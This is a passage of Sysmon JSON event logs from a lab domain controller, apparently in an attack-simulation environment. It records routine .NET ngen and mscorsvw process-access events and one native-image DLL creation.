C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:26.225","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2282-5F25-0000-001054EC0E00}","TargetProcessId":"4132","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7756,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:26.225\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2282-5F25-0000-001054EC0E00}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:26.225","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2282-5F25-0000-001054EC0E00}","TargetProcessId":"4132","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7757,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:26.241\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2282-5F25-0000-001054EC0E00}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:26.241","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2282-5F25-0000-001054EC0E00}","TargetProcessId":"4132","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7758,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:26.584\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2282-5F25-0000-0010AAF00E00}\r\nTargetProcessId: 1464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:26.584","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2282-5F25-0000-0010AAF00E00}","TargetProcessId":"1464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7759,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:26.584\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2282-5F25-0000-0010AAF00E00}\r\nTargetProcessId: 1464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:26.584","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2282-5F25-0000-0010AAF00E00}","TargetProcessId":"1464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7760,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:26.584\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2282-5F25-0000-0010AAF00E00}\r\nTargetProcessId: 1464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:26.584","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2282-5F25-0000-0010AAF00E00}","TargetProcessId":"1464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7761,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:32.303\r\nProcessGuid: {41C8662E-2282-5F25-0000-0010AAF00E00}\r\nProcessId: 1464\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\5b8-0\\System.Design.dll\r\nCreationUtcTime: 2020-08-01 08:06:32.303","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:32.303","ProcessGuid":"{41C8662E-2282-5F25-0000-0010AAF00E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\5b8-0\\System.Design.dll","CreationUtcTime":"2020-08-01 08:06:32.303","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7762,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:32.475\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2288-5F25-0000-001027F70E00}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:32.475","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2288-5F25-0000-001027F70E00}","TargetProcessId":"3716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7763,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:32.475\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2288-5F25-0000-001027F70E00}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:32.475","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2288-5F25-0000-001027F70E00}","TargetProcessId":"3716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
